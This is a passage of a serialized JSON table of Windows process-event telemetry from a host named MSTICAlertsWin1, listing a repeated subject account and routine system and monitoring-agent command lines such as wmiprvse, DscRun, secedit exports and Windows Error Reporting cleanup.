ORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\"],\"CommandLine\":[\"NaN\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\\\" -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\unlodctr.exe\\\" \\\"cps etw data source\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\\\" /noconfig /fullpaths @\\\"C:\\\\Windows\\\\TEMP\\\\y2cnqfwv\\\\y2cnqfwv.cmdline\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \\\"/OUT:C:\\\\Windows\\\\TEMP\\\\RES11C7.tmp\\\" \\\"c:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\889\\\\CSC59E7803C44264BB494469645A4F791C0.TMP\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\lodctr.exe\\\" \\\"C:\\\\Windows\\\\TEMP\\\\tmp110B.tmp\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c rmdir /s /q C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\ReportQueue\\\\\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c WerFault.exe -k -q\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"WerFault.exe  -k -q\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"ChangeEventModuleBatchSize.vbs\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"ChangeEventModuleBatchSize.vbs\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\MOF\\\\MOFWriter.exe\\\"  -baseline \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\922\\\\BaselineWindowsServer2016.xml\\\" -out \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\410045\\\\BaselineRulesetAll.mof\\\" -err \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\410045\\\\xmlToMoferrors.txt\\\" \",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\\\" Get \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\410045\\\\BaselineRulesetAll.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\410045\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\secedit.exe /export /cfg \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\Configuration\\\\AzureSecurityPack\\\\secedit.inf\\\"\",\"C:\\\\Windows\\\\system32\\\\secedit.exe /export /mergedpolicy /cfg \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\Configuration\\\\AzureSecurityPack\\\\secedit.inf\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3473\\\\WebBinaries\\\\Microsoft.Sirona.OMS.Security.BaselineAssessment.exe\\\" -execPackage \\\"ANYPATH\\\" -w \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3473\\\\410045\\\" -trace Off -smtrace Warning -discoverysettings Server:ServerName=MSTICAlertsWin1 -managementgroupid  -managementgroupname \\\"\\\" -assessmentId a1d21da7-586b-4b73-95cb-2405d2a54f5f -computername MSTICAlertsWin1 -assessmentname Web -headers False -maxdcs 300 -baselinerulesfilepath \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\916\\\\WebBaselineRules.xml\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring 